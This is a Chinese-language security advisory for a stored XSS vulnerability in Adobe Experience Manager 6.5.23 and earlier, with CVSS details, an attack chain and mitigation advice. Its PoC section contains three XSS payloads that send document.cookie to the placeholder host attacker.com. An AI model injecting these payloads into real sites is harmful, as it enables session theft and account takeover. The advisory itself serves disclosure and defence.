CVE-2025-64557 CVSS 5.4 中危

CVE-2025-64557 Adobe Experience Manager存储型XSS漏洞

披露日期: 2025-12-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-64557

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

Adobe Experience Manager(AEM)6.5.23及更早版本存在一个存储型跨站脚本(XSS)漏洞。该漏洞由于应用程序未能对用户输入进行充分的过滤和转义处理，导致恶意JavaScript代码可以被永久存储在服务器端。当其他用户访问包含恶意内容的页面时，存储的脚本会在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。攻击者利用此漏洞需要具备低权限账户，诱使具有更高权限的用户访问恶意页面。由于脚本存储在服务器端，攻击具有持久性，对所有访问受影响页面的用户都会造成威胁。

技术细节

该漏洞属于存储型XSS(Stored XSS)，也称为持久性XSS。攻击原理如下：1)攻击者通过低权限账户在AEM的表单字段中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>；2)由于应用程序未对输入进行HTML实体编码，恶意脚本被直接存储到数据库中；3)当其他用户浏览包含该表单字段的页面时，受污染的数据从服务器端取出并嵌入到HTML响应中；4)用户浏览器将恶意脚本作为页面的一部分执行，成功绕过同源策略限制。存储型XSS的危险性高于反射型XSS，因为攻击代码会持久存在于服务器上，无需诱导用户点击特定链接即可自动触发。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标AEM实例版本，确认版本号<=6.5.23

STEP 2

Initial Access

攻击者使用低权限账户登录AEM系统

STEP 3

Payload Injection

在存在漏洞的表单字段中注入恶意JavaScript代码

STEP 4

Persistence

恶意脚本被存储到AEM数据库中，等待被访问

STEP 5

Delivery

诱导具有高权限的管理员或用户访问包含恶意内容的页面

STEP 6

Execution

受害者浏览器执行存储的恶意脚本，窃取敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-64557 Stored XSS PoC -->
<!-- 攻击者将以下Payload注入到AEM表单字段中 -->
<script>
  // 获取当前页面Cookie
  var cookies = document.cookie;
  
  // 发送到攻击者控制的服务器
  fetch('https://attacker.com/steal?c=' + encodeURIComponent(cookies), {
    method: 'GET',
    mode: 'no-cors'
  });
  
  // 弹窗验证漏洞存在
  alert('XSS Triggered - Cookie: ' + cookies);
</script>

<!-- 简化的XSS Payload -->
<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">

<!-- 绕过基本过滤的变形Payload -->
<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

影响范围

Adobe Experience Manager 6.5.23及更早版本

AEM Cloud Service (受影响版本待确认)

防御指南

临时缓解措施

立即升级Adobe Experience Manager至6.5.24或更高版本；对于无法立即更新的系统，可临时禁用未使用的表单组件，实施严格的输入过滤规则，并配置Content-Security-Policy响应头限制脚本执行；同时加强用户权限管理，限制低权限账户对表单字段的编辑能力。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表